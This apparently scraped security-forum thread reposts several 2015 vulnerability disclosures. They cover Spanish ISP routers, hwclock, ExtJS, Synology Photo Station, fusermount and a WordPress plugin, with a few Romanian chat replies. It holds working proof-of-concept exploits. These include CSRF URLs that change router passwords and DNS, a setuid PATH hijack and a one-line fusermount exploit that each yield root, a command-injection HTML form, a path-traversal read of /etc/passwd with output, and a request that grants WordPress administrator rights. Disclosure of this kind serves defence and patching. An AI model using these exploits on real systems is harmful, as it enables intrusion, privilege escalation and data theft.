attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router asks for username-password and returns HTTP 401 status code (unauthorized), but after multiple requests are sent, it replies with HTTP 400 status code and executes the action. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as diagnostic.htm and config_wifi.htm. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121777 (http://osvdb.org/show/osvdb/121777) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Dispositivos Conectados (Connected Devices) table. Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 (http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Astoria Model: ARV7510 Tested firmwares: 00.03.41 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121773 (http://osvdb.org/show/osvdb/121773) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and OSVDB-121888 (http://osvdb.org/show/osvdb/121888) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1 ============================================================================================ ============================================================================================ Manufacturer: Amper Model: ASL-26555 Tested firmwares: v2.0.0.37B_ES Comments: Common router that Spanish ISP Telefónica used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and OSVDB-121771 (http://osvdb.org/show/osvdb/121771) * PoC: Besides the main web configuration interface (port 80), there is a much more advanced one on port 8000 in which every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS It is also possible for an attacker to change the default router administrator password by sending the victim this URL: (URL is omitted due to size reasons) -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121772 (http://osvdb.org/show/osvdb/121772) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The vulnerable input field is found into the basic web interface on port 80. The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory, into the advanced web interface on port 8000. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Connected Clients table (Setup->Local Network). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: AR-5387un Tested firmwares: A731-410JAZ-C04_R02 Comments: Common router that ISP Jazztel used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Netgear Model: CG3100D Tested firmwares: v1.05.05 Comments: Common router that ISP ONO used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121795 (http://osvdb.org/show/osvdb/121795) * PoC: Every input field is vulnerable to CSRF. An attacker may code a malicious website which triggers a POST request to the victim’s router. When a website with that code is accessed, the POST request is sent and the attack is done. It is also possible for an attacker to reset the victim’s router to default settings by using custom source code. (Source codes have been omitted due to size reasons). -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121780 (http://osvdb.org/show/osvdb/121780) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del router (Advanced->Router status). ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: VG-8050 Tested firmwares: SB01-S412TLF-C07_R03 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Zyxel Model: P 660HW-B1A Tested firmwares: 3.10L.02 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121796 (http://osvdb.org/show/osvdb/121796) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the Hostname field within the Dynamic DNS subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121797 (http://osvdb.org/show/osvdb/121797) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/password.cgi?sysPassword=newpassword ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: 536+ Tested firmwares: A101-220TLF-C35 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DIR-600 Tested firmwares: PV6K3A8024009 Comments: -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master). Greetings, Jose Antonio Rodriguez Garcia Alvaro Folgado Rueda Ivan Sanz de Castro. Source: http://dl.packetstormsecurity.net/1505-exploits/soho-22vulns.txt
  16. @io.kent eu unul apreciez ca postezi. c? nu oricine în ziua de azi d? lucruri moca , dar gânde?tete c? mai sunt ?i copii mari hax0ri pe aici ?i ciordesc ?i schimb? parolele , dac? ai o inim? a?a mare ?i e?ti darnic î?i propun s? le criptezi. c? de atâta bine ce primesc unii , consider? c? tot li se cuvine. l
  17. Wellcome
  18. Hello, During a recent assessment I have stumbled across a system which had hwclock(8) setuid root hwclock is a part of util-linux, all versions affected $ man hwclock | sed -n '223,231p' Users access and setuid Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there's probably no need for users to use the direct ISA I/O method, so don't bother. In any case, hwclock will not allow you to set anything unless you have the superuser real uid. (This is restriction is not necessary if you haven't installed setuid root, but it's there for now). http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041 "The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required)." http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920 "program is designed to run setuid (in some situations)" Some comments in code and unfortunately also man page advertising that setuid is no problem. That's pretty stupid promise. from util-linux/2.26.2-5/sys-utils/hwclock.c http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748 /* Quotes in date_opt would ruin the date command we construct. */ if (strchr(date_opt, '"') != NULL) { warnx(_ ("The value of the --date option is not a valid date.\n" "In particular, it contains quotation marks.")); return 12; } sprintf(date_command, "date --date=\"%s\" +seconds-into-epoch=%%s", date_opt); [...] date_child_fp = popen(date_command, "r"); [...] hwclock uses popen() to date_command which is 'date --date=\"%s\" +seconds-into-epoch=%%s' Exploiting is trivial, since $PATH is user-controlled $ ls -l /usr/sbin/hwclock -rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock $ cat > date.c;gcc date.c -o date main() { chown("/tmp/sploit", 0, 0); chmod("/tmp/sploit", 04755); } ^D $ cp /bin/sh /tmp/sploit $ PATH=".:$PATH" /usr/sbin/hwclock --set --date="05/23/2015 20:35:37" hwclock: The date command issued by hwclock returned unexpected results. The command was: date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s The response was: hwclock: No usable set-to time. Cannot set clock. $ /tmp/sploit # id euid=0(root) groups=0(root) *Insert CVE Request here* Notes: Please note that this is possible on Debian-derived (and therefore Ubuntu), because /bin/sh is provided by dash which does NOT make use of privmode (does not drop privileges if ruid != euid, unlike bash), which is a very stupid idea. privmode is surprisingly effective at mitigating some common vulnerability classes and misconfigurations, and it has been around since mid 90's. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3)/popen(3) calls in setuid executables" TL;DR: When setuid root, hwclock relies on $PATH to popen() the date command, meaning privilege escalation can occur since $PATH is user-controlled. Patches are available, signed off by Karel Zak <kzak@redhat.com> https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1 Initial bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786804 Thanks, Federico Bento. ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. Source: http://dl.packetstormsecurity.net/1505-exploits/hwclock-escalate.txt
  19. Hi all?? Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request internal http services File: /examples/feed-viewer/feed-proxy.php line:3-line:6 $feed = $_REQUEST['feed']; if($feed != '' && strpos($feed, 'http') === 0){ header('Content-Type: text/xml'); $xml = file_get_contents($feed); When we request like this url http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http://10.1.1.1 if the resource exist,we can get internal http services info ??strpos($feed, 'http') === 0?? we can request this url to bypass the restrictions achieve arbitrary file read http://dev.sencha.com/extjs/5.0.0/examples/feed-viewer/feed-proxy.php?feed=http/../../../../../../../../../../../etc/passwd view the HTML source code root:x:0:0:Web-useast4 root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:Web-useast4 www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false landscape:x:103:108::/var/lib/landscape:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash ntp:x:105:111::/home/ntp:/bin/false snmp:x:106:112::/var/lib/snmp:/bin/false statd:x:107:65534::/var/lib/nfs:/bin/false postfix:x:108:114::/var/spool/postfix:/bin/false Submitter: zhanghao@Baidu X-team gaojianfeng@Baidu X-team shitong@Baidu X-team ________________________________ Id:Yaseng Hi: Hisengberg Team: Baidu X-team E-mail:gaojianfeng@baidu.com<mailto:gedongyu@baidu.com> [tips] Source: http://dl.packetstormsecurity.net/1505-exploits/extjs-disclose.txt
  20. ------------------------------------------------------------------------ Command injection vulnerability in Synology Photo Station ------------------------------------------------------------------------ Han Sahin, May 2015 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A command injection vulnerability was found in Synology Photo Station, which allows an attacker to execute arbitrary commands with the privileges of the webserver. An attacker can use this vulnerability to compromise a Synology DiskStation NAS, including all data stored on the NAS. ------------------------------------------------------------------------ Tested version ------------------------------------------------------------------------ This issue was tested on Synology Photo Station version 6.2-2858. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Synology reports that this issue has been resolved in Photo Station version 6.3-2945. https://www.synology.com/en-us/releaseNote/PhotoStation ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html Proof of concept The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt. <html> <body> <form action="http://<target>/photo/webapi/photo.php" method="POST"> <input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" /> <input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " /> <input type="hidden" name="api" value="SYNO.PhotoStation.Photo" /> <input type="hidden" name="method" value="edit" /> <input type="hidden" name="version" value="1" /> <input type="hidden" name="ps_username" value="admin" /> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> Sursa: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
  21. # Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # Here's how it works, $a holds the name of a shellscript to be executed as # root. a=/tmp/.$$; # $b is used twice, first to build the contents of shellscript $a, and then as # a command to make $a executable. Quotes are unused to save a character, so # the seperator must be escaped. b=chmod\ u+sx; # Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making # /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash, # and dont make it drop privileges. # # http://www.openwall.com/lists/oss-security/2013/08/22/12 # echo $b /bin/sh>$a; # Now make the $a script executable using the command in $b. This needlessly # sets the setuid bit, but that doesn't do any harm. $b $a; # Now make $a the directory we want fusermount to use. This directory name is # written to an arbitrary file as part of the vulnerability, so needs to be # formed such that it's a valid shell command. a+=\;$a; # Create the mount point for fusermount. mkdir -p $a; # fusermount calls setuid(geteuid()) to reset the ruid when it invokes # /bin/mount so that it can use privileged mount options that are normally # restricted if ruid != euid. That's acceptable (but scary) in theory, because # fusermount can sanitize the call to make sure it's safe. # # However, because mount thinks it's being invoked by root, it allows # access to debugging features via the environment that would not normally be # safe for unprivileged users and fusermount doesn't sanitize them. # # Therefore, the bug is that the environment is not cleared when calling mount # with ruid=0. One debugging feature available is changing the location of # /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary # files. # # In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the # current shell from $0...so it only works if you're using bash!). # # The line written by fusermount will look like this: # # /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx # # Which will try to execute /dev/fuse with the paramter /tmp/_, fail because # /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse # xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the # next time root logs in. # # Another way to exploit it would be overwriting /etc/default/locale, then # waiting for cron to run /etc/cron.daily/apt at midnight. That means root # wouldn't have to log in, but you would have to wait around until midnight to # check if it worked. # # And we have enough characters left for a hash tag/comment. LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # Here is how the exploit looks when you run it: # # $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 # fusermount: failed to open /etc/fuse.conf: Permission denied # sending file descriptor: Socket operation on non-socket # $ cat /etc/bash.bashrc # /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0 # # Now when root logs in next... # $ sudo -s # bash: /dev/fuse: Permission denied # # ls -Ll /bin/sh # -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh # # exit # $ sh -c 'id' # euid=0(root) groups=0(root) # # To repair the damage after testing, do this: # # $ sudo rm /etc/bash.bashrc # $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash # $ sudo chmod 0755 /bin/sh # $ sudo umount /tmp/.$$\;/tmp/.$$ # $ rm -rf /tmp/.$$ /tmp/.$$\; # Sursa: http://dl.packetstormsecurity.net/1505-exploits/fusermount-escalate.txt
  22. Wellcome
  23. # Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 3 Actions taken after discovery Vendor was informed on 2015/05/19. 4 Solution No official solution yet exists. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt
  24. OFF: po?i începe cu : ON: Bine ai venit , da ai g?sit locul potrivit.
×
×
  • Create New...